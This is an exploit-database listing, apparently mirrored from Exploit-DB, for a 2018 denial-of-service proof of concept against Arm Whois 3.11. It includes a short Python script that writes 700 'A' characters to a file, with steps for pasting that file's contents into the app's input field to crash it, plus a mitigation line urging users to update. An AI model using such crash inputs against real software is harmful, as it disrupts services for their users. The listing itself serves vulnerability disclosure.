header-logo
Suggest Exploit
vendor:
Arm Whois
by:
Yair Rodríguez Aparicio
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Arm Whois
Affected Version From: 3.11
Affected Version To: 3.11
Patch Exists: Yes
Related CWE: N/A
CPE: a:armcode:arm_whois:3.11
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP
2018

Arm Whois 3.11 – Denial of Service (PoC)

This exploit causes a denial of service in Arm Whois 3.11 by creating a text file with 700 'A' characters and pasting the content of the file into the 'IP address or domain' field of the application. This causes the application to crash.

Mitigation:

Users should update to the latest version of Arm Whois to ensure that they are not vulnerable to this exploit.
Source

Exploit-DB raw data:

# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Date: 2018-10-31
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86 

# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!

buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR